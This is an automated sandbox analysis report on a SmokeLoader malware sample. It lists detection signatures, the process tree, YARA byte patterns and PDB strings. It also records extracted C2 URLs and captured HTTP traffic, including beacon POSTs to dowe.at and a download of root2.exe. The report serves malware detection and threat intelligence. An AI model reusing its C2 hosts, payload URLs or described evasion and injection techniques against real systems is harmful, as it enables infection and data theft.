Windows Analysis Report
file.exe

Overview

General Information

Sample Name: file.exe
Analysis ID: 756294
MD5: 1cf06beb83d2bd1afd1b9b62994e7549
SHA1: 88bd7da7668fb669b5503696ee0a9c0f2dbeceb7
SHA256: 4dc0de570728f75f844c7afb84ac6c809ef4620dac3b12a884ff9916f5b5b0ee
Tags: exe, SmokeLoader

Detection

SmokeLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected UAC Bypass using CMSTP
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
Detected unpacking (overwrites its own PE header)
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Maps a DLL or memory area into another process
Machine Learning detection for sample
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Deletes itself after installation
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Checks if the current machine is a virtual machine (disk enumeration)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
AV process strings found (often used to terminate AV products)
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Yara detected Keylogger Generic
Launches processes in debugging mode, may be used to hinder debugging
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • file.exe (PID: 5200 cmdline: C:\Users\user\Desktop\file.exe MD5: 1CF06BEB83D2BD1AFD1B9B62994E7549)
    • explorer.exe (PID: 3452 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • ADCA.exe (PID: 1432 cmdline: C:\Users\user\AppData\Local\Temp\ADCA.exe MD5: 2479739C5D062ECB325147623241F007)
        • rundll32.exe (PID: 4912 cmdline: C:\Windows\system32\rundll32.exe C:\Users\user\AppData\Local\Temp\Serpodtudpwhhta.dll,start MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
          • WerFault.exe (PID: 4872 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 688 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
          • WerFault.exe (PID: 3808 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 688 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
      • 5AF.exe (PID: 5580 cmdline: C:\Users\user\AppData\Local\Temp\5AF.exe MD5: C81AB83835C2669DBE57C43DB54571B7)
  • dfhwrav (PID: 5440 cmdline: C:\Users\user\AppData\Roaming\dfhwrav MD5: 1CF06BEB83D2BD1AFD1B9B62994E7549)
  • 5AF.exe (PID: 2388 cmdline: "C:\Users\user\AppData\Local\Temp\5AF.exe" MD5: C81AB83835C2669DBE57C43DB54571B7)
  • cleanup
{"C2 list": ["http://piratia.su/tmp/", "http://dowe.at/tmp/", "http://xisac.com/tmp/", "http://newhorizonswv.com/tmp/", "http://cracker.biz/tmp/", "http://piratia-life.ru/tmp/"]}
Source | Rule | Description | Author | Strings
00000010.00000002.491008397.00000000005E9000.00000040.00000020.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown
  • 0xff0:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.340150414.0000000002080000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security
00000000.00000002.340150414.0000000002080000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Smokeloader_4e31426e | unknown | unknown
  • 0x744:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000009.00000002.385320932.00000000020A1000.00000004.10000000.00040000.00000000.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security
00000009.00000002.385320932.00000000020A1000.00000004.10000000.00040000.00000000.sdmp | Windows_Trojan_Smokeloader_4e31426e | unknown | unknown
  • 0x344:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0

Source | Rule | Description | Author | Strings
0.2.file.exe.2070e67.1.raw.unpack | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security
0.2.file.exe.400000.0.unpack | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security
9.3.dfhwrav.2080000.0.raw.unpack | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security
9.2.dfhwrav.400000.0.unpack | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security
9.2.dfhwrav.6d0e67.1.raw.unpack | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security

No Sigma rule has matched
No Snort rule has matched

AV Detection

Source: file.exe | Virustotal: Detection: 33%
Source: http://piratia.su/tmp/ | URL Reputation: Label: malware
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\dfhwrav | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\ADCA.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\5AF.exe | Joe Sandbox ML: detected
Source: 22.2.5AF.exe.23be12c.2.unpack | Avira: Label: TR/Patched.Ren.Gen7
Source: 00000000.00000002.340150414.0000000002080000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: SmokeLoader {"C2 list": ["http://piratia.su/tmp/", "http://dowe.at/tmp/", "http://xisac.com/tmp/", "http://newhorizonswv.com/tmp/", "http://cracker.biz/tmp/", "http://piratia-life.ru/tmp/"]}
Source: C:\Users\user\AppData\Local\Temp\ADCA.exe | Code function: 10_2_00878884 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,
Source: C:\Users\user\AppData\Local\Temp\ADCA.exe | Code function: 10_2_00881940 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyKey,CryptReleaseContext,
Source: C:\Users\user\AppData\Local\Temp\ADCA.exe | Code function: 10_2_0087885C CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,
Source: C:\Users\user\AppData\Local\Temp\ADCA.exe | Code function: 10_2_008799FF CryptDestroyHash,
Source: C:\Users\user\AppData\Local\Temp\ADCA.exe | Code function: 10_2_0087A511 CryptReleaseContext,
Source: C:\Users\user\AppData\Local\Temp\ADCA.exe | Code function: 10_2_00884967 CryptReleaseContext,
Source: C:\Users\user\AppData\Local\Temp\ADCA.exe | Code function: 10_2_00883F6C CryptDestroyHash,

Exploits

Source: Yara match | File source: 16.2.5AF.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 22.2.5AF.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000016.00000002.517229882.0000000000413000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.486093572.0000000000413000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY

Compliance

Source: C:\Users\user\AppData\Local\Temp\ADCA.exe | Unpacked PE file: 10.2.ADCA.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\5AF.exe | Unpacked PE file: 16.2.5AF.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\5AF.exe | Unpacked PE file: 22.2.5AF.exe.400000.0.unpack
Source: file.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown | HTTPS traffic detected: 5.135.247.111:443 -> 192.168.2.6:49739 version: TLS 1.2
Source: Binary string: setupapi.pdbf source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: sfc_os.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jfmo\tlcp\nyvnyt\obocmwsb.pdb source: 5AF.exe, 00000016.00000002.637978186.0000000004BA6000.00000004.00000800.00020000.00000000.sdmp, 5AF.exe, 00000016.00000002.522529716.00000000023B8000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: cryptbase.pdbD source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: shcore.pdb source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\dohaf\kaxidin\wukoni\wefof\nojeyuve jucahazetozep zisasime.pdb0f source: 5AF.exe, 00000010.00000000.456599162.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, 5AF.exe, 00000016.00000000.482478776.0000000000401000.00000020.00000001.01000000.0000000B.sdmp
Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: advapi32.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: fltLib.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: shell32.pdb source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: msctf.pdby source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: comctl32v582.pdbB source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wsspicli.pdb6 source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: fltLib.pdbR source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wimm32.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: mpr.pdb source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mpr.pdbA source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: sechost.pdb0 source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: setupapi.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: imagehlp.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Qrundll32.pdb source: WerFault.exe, 00000013.00000003.506255817.0000000004740000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000013.00000003.489353790.000000000473F000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000013.00000003.494807738.000000000473F000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: Qrundll32.pdb^t source: WerFault.exe, 00000013.00000003.527460296.0000000004740000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000013.00000003.527287787.0000000004740000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: shcore.pdbk source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\omtnkdoj\bnwv\yogisfk\cqf.pdb source: 5AF.exe, 00000010.00000002.485930859.0000000000410000.00000040.00000001.01000000.0000000B.sdmp, 5AF.exe, 00000016.00000002.517131758.0000000000410000.00000040.00000001.01000000.0000000B.sdmp
Source: Binary string: C:\xehalulomuto\5\wacewatolere ciralameko_sunumeginupah\kupuwu.pdb source: ADCA.exe, 0000000A.00000000.410105733.0000000000401000.00000020.00000001.01000000.00000008.sdmp
Source: Binary string: profapi.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\bfllk\pdgh\qovxk\wqdtbmac.pdb source: 5AF.exe, 00000016.00000002.637978186.0000000004BA6000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: winspool.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: iphlpapi.pdbz source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: shell32.pdbk source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: sechost.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: combase.pdbt source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 5C:\xehalulomuto\5\wacewatolere ciralameko_sunumeginupah\kupuwu.pdb0f source: ADCA.exe, 0000000A.00000000.410105733.0000000000401000.00000020.00000001.01000000.00000008.sdmp
Source: Binary string: propsys.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: powrprof.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: msctf.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\yepiro_lafonu\vekamogudit62\deney\jef.pdb source: file.exe, 00000000.00000000.243494837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, dfhwrav, 00000009.00000000.369163815.0000000000401000.00000020.00000001.01000000.00000007.sdmp
Source: Binary string: ole32.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: version.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: AcLayers.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: propsys.pdb` source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: sfc.pdbB source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: oleaut32.pdbl source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: IC:\yepiro_lafonu\vekamogudit62\deney\jef.pdb0f source: file.exe, 00000000.00000000.243494837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, dfhwrav, 00000009.00000000.369163815.0000000000401000.00000020.00000001.01000000.00000007.sdmp
Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: advapi32.pdbJ source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: netapi32.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: comctl32v582.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: combase.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\bfllk\pdgh\qovxk\wqdtbmac.pdb/; source: 5AF.exe, 00000016.00000002.637978186.0000000004BA6000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: c:\jfmo\tlcp\nyvnyt\obocmwsb.pdb/; source: 5AF.exe, 00000016.00000002.637978186.0000000004BA6000.00000004.00000800.00020000.00000000.sdmp, 5AF.exe, 00000016.00000002.522529716.00000000023B8000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: rundll32.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: sfc.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: powrprof.pdbX source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: apphelp.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\dohaf\kaxidin\wukoni\wefof\nojeyuve jucahazetozep zisasime.pdb source: 5AF.exe, 00000010.00000000.456599162.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, 5AF.exe, 00000016.00000000.482478776.0000000000401000.00000020.00000001.01000000.0000000B.sdmp
Source: Binary string: wuser32.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: profapi.pdb^ source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: netutils.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: netapi32.pdbk source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Local\Temp\ADCA.exe | Code function: 10_2_0040D450 FindFirstFileW,FindClose,
Source: C:\Users\user\AppData\Local\Temp\ADCA.exe | Code function: 10_2_004235B0 FindFirstFileW,FindClose,
Source: C:\Users\user\AppData\Local\Temp\ADCA.exe | Code function: 10_2_0040CE84 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,

Networking

Source: C:\Windows\explorer.exe | Domain query: thepokeway.nl
Source: C:\Windows\explorer.exe | Network Connect: 123.253.32.170 80
Source: C:\Windows\explorer.exe | Domain query: dowe.at
Source: Malware configuration extractor | URLs: http://piratia.su/tmp/
Source: Malware configuration extractor | URLs: http://dowe.at/tmp/
Source: Malware configuration extractor | URLs: http://xisac.com/tmp/
Source: Malware configuration extractor | URLs: http://newhorizonswv.com/tmp/
Source: Malware configuration extractor | URLs: http://cracker.biz/tmp/
Source: Malware configuration extractor | URLs: http://piratia-life.ru/tmp/
Source: Joe Sandbox View | ASN Name: OVHFR
Source: Joe Sandbox View | JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: Joe Sandbox View | IP Address: 5.135.247.111
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Server: nginx/1.14.2 | Date: Tue, 29 Nov 2022 23:11:06 GMT | Content-Type: application/octet-stream | Content-Length: 3776000 | Last-Modified: Tue, 29 Nov 2022 23:10:03 GMT | Connection: keep-alive | ETag: "6386914b-399e00" | Accept-Ranges: bytes
Source: global traffic | HTTP traffic detected: GET /upload/index.php HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: thepokeway.nl
Source: global traffic | HTTP traffic detected: POST /tmp/ HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://tajcoxqjmd.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 292 | Host: dowe.at
Source: global traffic | HTTP traffic detected: POST /tmp/ HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://owxfgf.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 207 | Host: dowe.at
Source: global traffic | HTTP traffic detected: POST /tmp/ HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://dqkjujneki.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 112 | Host: dowe.at
Source: global traffic | HTTP traffic detected: POST /tmp/ HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://yfupv.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 253 | Host: dowe.at
Source: global traffic | HTTP traffic detected: POST /tmp/ HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://lawtvrqx.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 250 | Host: dowe.at
Source: global traffic | HTTP traffic detected: GET /root2.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: 123.253.32.170
Source: global traffic | HTTP traffic detected: POST /tmp/ HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://frwum.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 226 | Host: dowe.at
Source: global traffic | HTTP traffic detected: POST /tmp/ HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ifardcruc.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 341 | Host: dowe.at
Source: global traffic | HTTP traffic detected: POST /tmp/ HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://gbbshbjmpq.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 189 | Host: dowe.at
Source: global traffic | HTTP traffic detected: POST /tmp/ HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://dkguxo.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 305 | Host: dowe.at
Source: global traffic | HTTP traffic detected: POST /tmp/ HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://frdxrq.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 168 | Host: dowe.at
Source: global traffic | HTTP traffic detected: POST /tmp/ HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://plraoc.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 351 | Host: dowe.at
Source: global traffic | HTTP traffic detected: POST /tmp/ HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://panajd.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 205 | Host: dowe.at
Source: global traffic | HTTP traffic detected: POST /tmp/ HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://queeh.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 150 | Host: dowe.at
Source: global traffic | HTTP traffic detected: POST /tmp/ HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://lvqyks.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 344 | Host: dowe.at
Source: global traffic | HTTP traffic detected: POST /tmp/ HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://oidcj.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 321 | Host: dowe.at
Source: global traffic | HTTP traffic detected: POST /tmp/ HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ljwdjes.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 118 | Host: dowe.at
Source: global traffic | HTTP traffic detected: POST /tmp/ HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://bajxyhac.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 160 | Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fbxsgv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 343Host: dowe.at
